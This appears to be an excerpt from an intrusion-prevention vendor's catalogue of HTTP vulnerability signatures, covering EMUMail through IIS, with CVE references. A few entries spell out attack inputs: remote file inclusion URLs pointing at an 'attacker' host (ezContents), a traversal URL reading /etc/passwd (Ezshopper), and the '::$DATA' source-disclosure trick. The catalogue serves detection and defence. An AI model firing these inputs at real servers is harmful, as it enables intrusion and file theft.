https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4489
BID-25383
http://www.securityfocus.com/bid/25383
OSVDB-37738
http://www.osvdb.org/37738
Back to top

HTTP-Emumail-Cgi-Cross-Site

About this vulnerability: Emumail.cgi cross-site vulnerability
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMUMail
Type: Malfunction
Description: EMUMail can be exploited by entering arbitrary HTML or script code into the email address field. This will result in the execution of the script code in the security context of the EMUMail site.
Situation: HTTP_CRL-Emumail-Cgi-Cross-Site
References:
CVE-2002-1526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1526
BID-5824
http://www.securityfocus.com/bid/5824
Back to top

HTTP-Everythingform-Cgi-System-Compromise

About this vulnerability: Malfunction in everythingform.cgi allows system compromise
Risk: Moderate
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Leif M. Wright everythingform.cgi
Type: Malfunction
Description: Leif M. Wright's everythingform.cgi does not sufficiently validate user input. Remote attackers can run arbitrary shell commands with the web server's privileges by passing suitable arguments to the 'config' field.
References:
CVE-2001-0023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0023
BID-2101
http://www.securityfocus.com/bid/2101
Back to top

HTTP-eXtropia-Webstore-Command-Execution

About this vulnerability: Arbitrary command execution vulnerability in Extropia Webstore
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: eXtropia WebStore
Type: Malfunction
Description: Extropia Webstore does not filter user input properly. This allows remote attackers to execute arbitrary commands on the host.
Situation: HTTP_CRL-eXtropia-Webstore-Command-Execution
References:
CVE-2004-0734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0734
BID-10744
http://www.securityfocus.com/bid/10744
Back to top

HTTP-Ezcontents-Globals-Php-Code-Injection

About this vulnerability: Ezcontents allows arbitrary php code injection
Risk: High
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ezContents
Type: PHP Injection
Description: Visual Shapers EzContents allows arbitrary php files to be included. Requesting http://[target]/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://attacker/ will import the code from http://attacker/include/adodb/adodb.inc.php. Also http://[target]/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://attacker/&GLOBALS[gsLanguage]=ezContents will import code from http://attacker/ezContents/lang_admin.php. Remote attackers may exploit these vulnerabilities to run arbitrary php code on the server.
Situation: HTTP_CRL-Ezcontents-Globals-Php-Code-Injection
References:
CVE-2004-0132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0132
BID-9638
http://www.securityfocus.com/bid/9638
Back to top

HTTP-Ezcontents-Module-Php-Link-System-Compromise

About this vulnerability: Ezcontents module.php allows arbitrary PHP code execution
Risk: Moderate
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ezContents
Type: Malfunction
Description: ezContents module.php allows remote attackers to execute arbitrary PHP code on the host by passing a URL to module.php that points to a malicious script.
Situation: HTTP_CRL-Ezcontents-Module-Php-Link-System-Compromise
References:
CVE-2004-0070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0070
BID-9396
http://www.securityfocus.com/bid/9396
OSVDB-6878
http://www.osvdb.org/6878
Back to top

HTTP-Ezshopper-Loadpage-Cgi-File-Disclosure

About this vulnerability: Ezshopper loadpage.cgi has a directory traversal vulnerability
Risk: Moderate
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Ezshopper
Type: Directory Traversal
Description: Ezshoppers loadpage.cgi has a directory traversal vulnerability. Remote attackers may view arbitrary files from the webserver by sending a directory traversal sequence to loadpage.cgi?file. For example, http://www.example.com/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html
References:
CVE-2000-1092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1092
BID-2109
http://www.securityfocus.com/bid/2109
Back to top

HTTP-F-Prot-Anti-Virus-ACE-File-Denial-Of-Service

About this vulnerability: Denial of service vulnerbility in F-Prot Anti-Virus
Risk: Low
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: F-Prot Anti-Virus
Type: Input Validation
Description: There is a denial of service vulnerability in F-Prot Anti-Virus. A malicious, crafted ACE archive file causes an infinite loop in the F-Prot Anti-Virus scanning engine.
Situation: HTTP_F-Prot-Anti-Virus-ACE-File-Denial-Of-Service
File-Binary_F-Prot-Anti-Virus-ACE-File-Denial-Of-Service
References:
CVE-2006-6352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6352
BID-21420
http://www.securityfocus.com/bid/21420
Back to top

HTTP-F-Prot-Anti-Virus-CHM-File-Heap-Overflow

About this vulnerability: Heap overflow vulnerbility in F-Prot Anti-Virus
Risk: Moderate
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1730-5242
Platform: Generic
Software: F-Prot Anti-Virus
Type: Input Validation
Description: There is a heap overflow vulnerability in F-Prot Anti-Virus. A malicious, crafted compressed help (CHM) file allows code exection or denial of service in the F-Prot Anti-Virus scanning engine.
Situation: HTTP_F-Prot-Anti-Virus-CHM-File-Heap-Overflow
References:
CVE-2006-6293
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6293
BID-21086
http://www.securityfocus.com/bid/21086
OSVDB-30406
http://www.osvdb.org/30406
Back to top

HTTP-Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF

About this vulnerability: Buffer overflow vulnerability in the Facebook Photo Uploader ActiveX control
Risk: Moderate
First detected in: sgpkg-ips-147-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Facebook Photo Uploader
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Facebook Photo Uploader ActiveX control. By persuading a user to view a malicious web page, a remote attacker can execute arbitrary code with the privileges of the currently logged on user.
Situation: HTTP_SS-Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF
File-Text_Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF
References:
CVE-2008-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0660
BID-27756
http://www.securityfocus.com/bid/27756
Back to top

HTTP-Failed-Authentication

About this vulnerability: Failed HTTP authentication attempt
Risk: Low
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server
Type: Failed Login
Description: Failed HTTP authentication attempt. If these failed attempts come in large numbers from a single host, a remote attacker may be trying to guess passwords via a brute-force method.
Situation: HTTP_SLS-Unauthorized-Status-Code
Back to top

HTTP-Filemail-Pl-System-Compromise

About this vulnerability: Arbitrary command execution via filemail.pl
Risk: High
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Lakeweb Filemail
Type: Metacharacter Injection
Description: Lakeweb's filemail.pl script does not sufficiently validate input, allowing remote attackers to execute arbitrary commands on the host by passing suitable arguments to the script.
References:
CVE-1999-1154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1154
Back to top

HTTP-Firefox-BMP-Parser-Buffer-Overflow

About this vulnerability: Firefox .bmp image parser buffer overflow
Risk: High
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1730-5242
Platform: Windows
Software: Mozilla Firefox; Mozilla Suite; Mozilla Thunderbird
Type: Buffer Overflow
Description: Mozilla Firefox, Mozilla, and Thunderbird are vulnerable to a buffer overflow while parsing BMP images. Attackers can specify large values to the height and width of an image, thus causing an image size variable to overflow (height*width). A successful exploit allows running arbitrary code.
Situation: HTTP_Firefox-BMP-Parser-Buffer-Overflow
References:
CVE-2004-0904
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0904
BID-11171
http://www.securityfocus.com/bid/11171
Back to top

HTTP-Firefox-Executable-Image-Dragging-Vulnerability

About this vulnerability: Invalid image file extension handling vulnerability in Firefox
Risk: Moderate
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mozilla Firefox; Mozilla Suite; Mozilla Thunderbird
Type: Malfunction
Description: HTML image tags can refer to files that have an executable file extension (for example .bat or .exe). A remote attacker is able to construct a .bat file that contains image data that can be rendered on the browser and also some commands that can be executed. Mozilla Firefox fails to validate the file extensions of image files and because of that it is possible to drag and drop the image from the HTML page to desktop where it is saved as executable file. If the user then double clicks the file, the embedded commands are executed on the host.
Situation: HTTP_Firefox-Executable-Image-Dragging-Vulnerability
File-Text_Firefox-Executable-Image-Dragging-Vulnerability
References:
CVE-2005-0230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0230
BID-12468
http://www.securityfocus.com/bid/12468
Back to top

HTTP-Firefox-Gif-Netscape-Extension-BOF

About this vulnerability: Firefox GIF handling vulnerability
Risk: High
First detected in: sgpkg-ips-24-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Buffer Overflow
Description: Firefox versions before 1.0.2 allow arbitrary code execution through specially-crafted GIF images. GIF images can include "application extension blocks" that applications can use to include additional information into images. A rarely used Netscape specific extension for supplying a buffer size for displaying the image is not parsed correctly, allowing a specially-crafted GIF image to overflow a buffer and execute arbitrary code. Remote attackers can exploit the vulnerability by tricking users of the vulnerable versions of Firefox to view crafted GIF images.
Situation: HTTP_SS-Firefox-Gif-Netscape-Extension-BOF
File-GIF_Mozilla-Firefox-Gif-Netscape-Extension-Buffer-Overflow
References:
CVE-2005-0399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0399
BID-15495
http://www.securityfocus.com/bid/15495
BID-12881
http://www.securityfocus.com/bid/12881
Back to top

HTTP-Flatnuke-Id-Parameter-Directory-Traversal

About this vulnerability: Flatnuke ID parameter allows directory traversal and arbitrary file disclosure
Risk: Moderate
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Flatnuke
Type: Directory Traversal
Description: Flatnuke, a content management system, has a directory traversal vulnerability. Passing directory traversal sequences (../) and a path followed by a null byte to the id parameter of Flatnuke's read module allows remote attackers to view arbitrary files from the web server.
Situation: HTTP_CSU-Flatnuke-Id-Parameter-Directory-Traversal
References:
CVE-2005-4208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4208
BID-15796
http://www.securityfocus.com/bid/15796
Back to top

HTTP-FtpLocate-Command-Execution

About this vulnerability: FtpLocate allows arbitrary command execution via HTTP requests
Risk: Moderate
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: FtpLocate
Type: Metacharacter Injection
Description: FtpLocate is a software that indexes FTP servers contents and allows search queries to multiple FTP servers. Insufficient user input validation allows remote attackers to execute arbitrary commands by passing the commands between pipe metacharacters (|) to the fsite parameter of flsearch.pl.
Situation: HTTP_CRL-FtpLocate-Command-Execution
References:
CVE-2005-2420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2420
BID-14367
http://www.securityfocus.com/bid/14367
OSVDB-18305
http://www.osvdb.org/18305
Back to top

HTTP-Groupwise-Gwweb-Vuln

About this vulnerability: Groupwise gwweb.exe revals path of server and any htm file
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: Novell GroupWise
Type: Directory Traversal
Description: The GroupWise gwweb.exe reveals the path of the server and contents of any directory and htm files.
References:
CVE-1999-1006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1006
BID-879
http://www.securityfocus.com/bid/879
Back to top

HTTP-Groupwise-ServletManager-Application-Admin

About this vulnerability: ServletManager uses default username/password
Risk: Low
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise
Type: Insecure Configuration
Description: Novell Groupwise 6.0 and Enchancement Pack 5.5 is installed with a default username and password for the servlet manager. If successfully exploited, this allows remote attackers to control the loading, unloading and reloading of servlets.
Situation: HTTP_CRL-Groupwise-ServletManager-Application-Admin
References:
CVE-2001-1195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1195
BID-3697
http://www.securityfocus.com/bid/3697
Back to top

HTTP-Guestserver-Cgi-System-Compromise

About this vulnerability: Command execution vulnerability in guestserver
Risk: High
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lars Ellingsen's Guestserver
Type: Malfunction
Description: Lars Ellingsen's guestserver does not sufficiently parse input, allowing remote attackers to place executable commands between pipe characters in the email parameter.
Situation: HTTP_CRL-Guestserver-Cgi-System-Compromise
References:
CVE-2001-0180
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0180
Back to top

HTTP-Guppy-Error-Php-Server-Remote-Addr-Php-Command-Execution

About this vulnerability: Error.php in Guppy allows arbitrary php code execution
Risk: Moderate
First detected in: sgpkg-ips-48-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Guppy
Type: PHP Injection
Description: Guppy, a PHP content management system, allows arbitrary remote PHP code execution. The _SERVER[REMOTE_ADDR] parameter in error.php can be overwritten, which causes error.php to include an attacker-supplied PHP file. This allows unauthenticated remote attackers to execute arbitrary PHP code on the Guppy server by sending a malicious request to error.php.
Situation: HTTP_CRL-Guppy-Error-Php-Server-Remote-Addr-Php-Command-Execution
References:
CVE-2005-3926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3926
BID-15609
http://www.securityfocus.com/bid/15609
Back to top

HTTP-Havij-SQL-Injection-Tool

About this vulnerability: Havij SQL Injection Tool
Risk: High
First detected in: sgpkg-ips-507-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: SQL Injection
Description: Havij SQL Injection tool can be used to find and exploit SQL injection vulnerabilities on a web page. There are both a free and a commercial version of the tool. The tool is developed and maintained by ITsecteam (www.itsecteam.com).
Situation: HTTP_CSH-Havij-SQL-Injection-Tool-Usage
Back to top

HTTP-His-Software-Auktion-Directory-Traversal

About this vulnerability: HIS Software Auktion Directory Traversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Windows 95; Windows 98; Windows NT
Software: HIS Software Auktion
Type: Directory Traversal
Description: HIS Software Auktion contains a vulnerability which can be exploited to read any file on the system via directory traversal.
References:
CVE-2001-0212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0212
BID-2367
http://www.securityfocus.com/bid/2367
Back to top

HTTP-Hosting-Controller-Information-Disclosure

About this vulnerability: Information disclosure vulnerability in Hosting Controller
Risk: Moderate
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Hosting Controller
Type: Malfunction
Description: Hosting Controller is a hosting automation tool for Windows 2000 servers. The software contains multiple information disclosure vulnerabilities that can be used to gain information about the computers managed by Hosting Controller.
Situation: HTTP_CSU-Hosting-Controller-HCDiskQuotaService-Access
References:
CVE-2005-0694
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0694
BID-12748
http://www.securityfocus.com/bid/12748
Back to top

HTTP-HP-OpenView-Network-Node-Manager-Node-Parameter-Command-Execution

About this vulnerability: Multiple scripts in HP OpenView Network Node Manager allow arbitrary command execution via shell metacharacters in URI
Risk: Moderate
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Malfunction
Description: Certain versions of the HP OpenView Network Node Manager do not correctly handle malicious HTTP requests. The scripts connectedNodes.ovpl, cdpView.ovpl, freeIPaddrs.ovpl and ecscmg.ovpl can be used to execute arbitrary commands via shell metacharacters in the 'node' parameter. The vulnerability allows unauthenticated remote attackers to execute arbitrary shell commands with HTTP requests.
Situation: HTTP_CRL-OpenView-Network-Node-Manager-Node-Parameter-Command-Execution
References:
CVE-2005-2773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2773
BID-14662
http://www.securityfocus.com/bid/14662
Back to top

HTTP-HP-Performance-Manager-Apache-Tomcat-Policy-Bypass

About this vulnerability: Policy bypass vulnerability in HP Performance Manager
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1588-5242
Platform: Any Operating System
Software: HP Performance Manager
Type: Malfunction
Description: There is a policy bypass vulnerability in HP Performance Manager. A remote attacker can exploit this vulnerability by sending a crafted HTTP request using a set of default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system and execute arbitrary code with the privileges of SYSTEM.
Situation: HTTP_CS-HP-Performance-Manager-Apache-Tomcat-Policy-Bypass
References:
CVE-2009-3548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548
BID-36954
http://www.securityfocus.com/bid/36954
OSVDB-60176
http://www.osvdb.org/60176
Back to top

HTTP-HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in HP Software Update
Risk: Moderate
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Software Update
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP Software Update. A remote attacker can exploit this vulnerability by delivering a malicious INI file to the target system and persuading a user to view a crafted web page to execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow
File-Text_HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow
References:
CVE-2008-0712
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0712
BID-28929
http://www.securityfocus.com/bid/28929
OSVDB-44767
http://www.osvdb.org/44767
Back to top

HTTP-Htgrep-Hdr-Directory-Traversal

About this vulnerability: Htgrep Hdr Directory Traversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: htgrep
Type: Directory Traversal
Description: Htgrep contains a vulnerability which can be exploited to read any file on the system by setting the full path into the hdr parameter.
References:
CVE-2000-0832
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0832
Back to top

HTTP-Hylafax-Faxsurvey-System-Compromise

About this vulnerability: Arbitrary command-execution vulnerability in Faxsurvey
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Hylafax
Type: Metacharacter Injection
Description: A vulnerability in the faxsurvey script from Hylafax allows remote attackers to execute arbitrary commands on the host. The vulnerability can be exploited by sending the commands as an argument to faxsurvey.
Situation: HTTP_CRL-Hylafax-Faxsurvey-System-Compromise
References:
CVE-1999-0262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0262
BID-2056
http://www.securityfocus.com/bid/2056
Back to top

HTTP-Hyperseek-Hsx-Cgi-Directory-Traversal

About this vulnerability: Hyperseek Hsx Cgi Directory Traversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: iWeb Systems HyperSeek 2000
Type: Directory Traversal
Description: Hyperseek 2000 contains a vulnerability which can reveal arbitary files on the system using directory traversal and null.
References:
CVE-2001-0253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0253
BID-2314
http://www.securityfocus.com/bid/2314
Back to top

HTTP-IBM-Lotus-Domino-Web-Server-HTTP-Header-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the IBM Lotus Domino Web Server application
Risk: High
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Lotus Domino
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in the IBM Lotus Domino Web Server application. A successful exploitation leads to a denial of service terminating the affected server, or System-level arbitrary code execution.
Situation: HTTP_CS-IBM-Lotus-Domino-Web-Server-HTTP-Header-Buffer-Overflow
References:
CVE-2008-2240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2240
BID-29310
http://www.securityfocus.com/bid/29310
OSVDB-45415
http://www.osvdb.org/45415
Back to top

HTTP-IBM-Lotus-Domino-Web-Service-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in Lotus Domino web service
Risk: Moderate
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Domino
Type: Resource Starvation
Description: There is a denial of service vulnerability in Lotus Domino web service. The vulnerability can be exploited by sending a crafted HTTP request with a long string of UTF-8 encoded UNICODE characters in URI, causing a DoS condition on the target server.
Situation: HTTP_CSU-IBM-Lotus-Domino-Web-Service-Denial-Of-Service
References:
CVE-2005-0986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0986
BID-13045
http://www.securityfocus.com/bid/13045
Back to top

HTTP-IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution

About this vulnerability: Command injection vulnerability in IBM Lotus Expeditor
Risk: High
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM Lotus Expeditor Client for Desktop
Type: Code Injection
Description: There is a command injection vulnerability in IBM Lotus Expeditor. A remote attacker can exploit this vulnerability by persuading a user to visit a malicious web page. Successful exploitation allows the attacker to inject and execute arbitrary commands with the privileges of the currently logged in user.
Situation: HTTP_SS-IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution
File-Text_IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution
References:
CVE-2008-1965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1965
BID-28926
http://www.securityfocus.com/bid/28926
OSVDB-44868
http://www.osvdb.org/44868
Back to top

HTTP-IBM-Lotus-Notes-Domino-Long-URI-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Lotus Notes Domino
Risk: High
First detected in: sgpkg-ips-333-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Domino
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in IBM Lotus Notes Domino Webserver. Succesful attack could allow the attacker to execute arbitrary commands on the remote server.
Situation: HTTP_CSU-Lotus-Notes-Cgi-Bin-BOF
References:
CVE-2000-0021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0021
BID-881
http://www.securityfocus.com/bid/881
Back to top

HTTP-IBM-Lotus-Sametime-Server-Multiplexer-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Community Services Multiplexer component of IBM Lotus Sametime
Risk: High
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1734-5242
Platform: Any Operating System
Software: IBM Lotus Sametime
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Community Services Multiplexer component of IBM Lotus Sametime. The vulnerability allows a remote unauthenticated attacker to cause a denial of service terminating the affected service or to execute System-level arbitrary code on the vulnerable system.
Situation: HTTP_CSU-IBM-Lotus-Sametime-Server-Multiplexer-Stack-Buffer-Overflow
References:
CVE-2008-2499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2499
BID-29328
http://www.securityfocus.com/bid/29328
OSVDB-45610
http://www.osvdb.org/45610
Back to top

HTTP-IBM-Tivoli-Storage-Manager-Host-Header-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in IBM Tivoli Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1581-5242
Platform: Windows
Software: IBM Tivoli
Type: Buffer Overflow
Description: The IBM Tivoli Storage Manager suffers from a buffer overflow vulnerability in its Client Acceptor Daemon (CAD) service. The service uses a protocol based on HTTP for communication, but has a flaw in the handling of HTTP Host headers. The vulnerability allows remote attackers to execute arbitrary code on a vulnerable host by sending an specially crafted long HTTP Host header.
References:
CVE-2007-4880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4880
BID-25743
http://www.securityfocus.com/bid/25743
OSVDB-38161
http://www.osvdb.org/38161
Back to top

HTTP-Ie-Anchorclick-Style-File-Import

About this vulnerability: File import vulnerability in IE
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: Microsoft Internet Explorer allows web pages to open local folders in a Web folder view. This can be used for example to trick victims to drag and drop malicious software to the local Startup folder.
Situation: HTTP_Ie-Anchorclick-Style-File-Import
File-Text_Ie-Anchorclick-Style-File-Import
References:
CVE-2004-0839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0839
BID-10973
http://www.securityfocus.com/bid/10973
MS04-038
http://technet.microsoft.com/security/bulletin/MS04-038
Back to top

HTTP-Ie-HTTP-Equiv-Meta-Tag-DoS

About this vulnerability: IE crashes when crafted http-equiv meta tag is encountered
Risk: Low
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: Some versions of Internet Explorer crash when they encounter a crafted Web page that uses the window.createPopup function to invoke a http-equiv meta tag.
Situation: HTTP_Ie-HTTP-Equiv-Meta-Tag-DoS
File-Text_Microsoft-Internet-Explorer-HTTP-Equiv-Meta-Tag-Denial-of-Service
References:
CVE-2004-0479
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0479
BID-10351
http://www.securityfocus.com/bid/10351
Back to top

HTTP-Ie-Showhelp-Double-Colon-System-Compromise

About this vulnerability: IE allows arbitrary local files to be executed with Showhelp and ::
Risk: Moderate
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: Internet Explorer allows arbitrary local files to be executed with the showHelp() function. By using a URL containing '/../' and a filename that ends with '::', remote attackers can execute arbitrary local files by tricking the victim to a specifically crafted web page.
Situation: HTTP_Ie-Showhelp-Double-Colon-System-Compromise
File-Text_Microsoft-Internet-Explorer-Showhelp-Double-Colon-System-Compromise
References:
CVE-2003-1041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1041
BID-9320
http://www.securityfocus.com/bid/9320
MS04-023
http://technet.microsoft.com/security/bulletin/MS04-023
Back to top

HTTP-Ie-Showhelp-Double-Slash-System-Compromise

About this vulnerability: IE allows execution of arbitrary local .chm files prefixed with \\
Risk: Moderate
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: Internet Explorer's ms-its protocol handler does not process correctly the double backslashes '\\'. This allows executing local CHM files by adding double backslashes before the target file name.
Situation: HTTP_Ie-Showhelp-Double-Slash-System-Compromise
File-Text_Microsoft-Internet-Explorer-Showhelp-Double-Slash-System-Compromise
References:
CVE-2004-0475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0475
BID-10348
http://www.securityfocus.com/bid/10348
Back to top

HTTP-IE5-Filename-Buffer-Overflow

About this vulnerability: IE 5 buffer overflow in filename handling
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 98; Windows 95; Windows 98 SE
Software: Internet Explorer 5.0
Type: Buffer Overflow
Description: Microsoft Windows 95 and 98 have a buffer overflow vulnerability in the networking code that handles filenames. A remote attacker can exploit this vulnerability to execute arbitrary code on the victim host.
Situation: HTTP_IE5-Filename-BOF
File-Text_Microsoft-Internet-Explorer-Filename-Buffer-Overflow
References:
BID-779
http://www.securityfocus.com/bid/779
Back to top

HTTP-IIS-Active-Data-Streams-Source-Code-Disclosure

About this vulnerability: IIS returns script source code when ::$DATA is appended to URI
Risk: Low
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1602-5242
Platform: Windows
Software: IIS 1.0; IIS 2.0; IIS 3.0; IIS 4.0
Type: Malfunction
Description: Microsoft IIS versions 1.0 - 4.0 are vulnerable to a source code disclosure. The file contents are returned when appending the string "::$DATA" after a file in an HTTP request. This allows remote attackers to read script source code from the host.
References:
CVE-1999-0278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0278
BID-149
http://www.securityfocus.com/bid/149
MS98-003
http://technet.microsoft.com/security/bulletin/MS98-003
Back to top

HTTP-IIS-ActivePerl-PerlIS.dll-Filename-Overflow

About this vulnerability: Buffer overflow in Microsoft IIS.
Risk: Critical
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ActivePerl
Type: Buffer Overflow
Description: ActivePerl is an implementation of the Perl scripting language for Microsoft Windows systems. It contains a remotely exploitable buffer overflow vulnerability in handling of the URL string. Exploitation of this vulnerability may allow for remote attackers to gain access to the target server.
Situation: HTTP_CSU-IIS-ActivePerl-PerlIS.dll-Filename-Overflow
References:
CVE-2001-0815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0815
BID-3526
http://www.securityfocus.com/bid/3526
OSVDB-678
http://www.osvdb.org/678
Back to top

HTTP-IIS-Asp-Chunked-Transfer-Encoding-Heap-Overflow

About this vulnerability: Buffer overflow in Microsoft IIS.
Risk: Critical
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 4.0; IIS 5.0
Type: Buffer Overflow
Description: A buffer overflow condition exists in a certain version of Microsoft IIS. The vulnerability exists in chunked-encoding processing of Active Server Pages. The server is reported to ship with a default script (iisstart.asp,) which is exploitable.
Situation: HTTP_CSH-IIS-Asp-Chunked-Encoding-Transfer-Heap-Overflow
References:
CVE-2002-0079
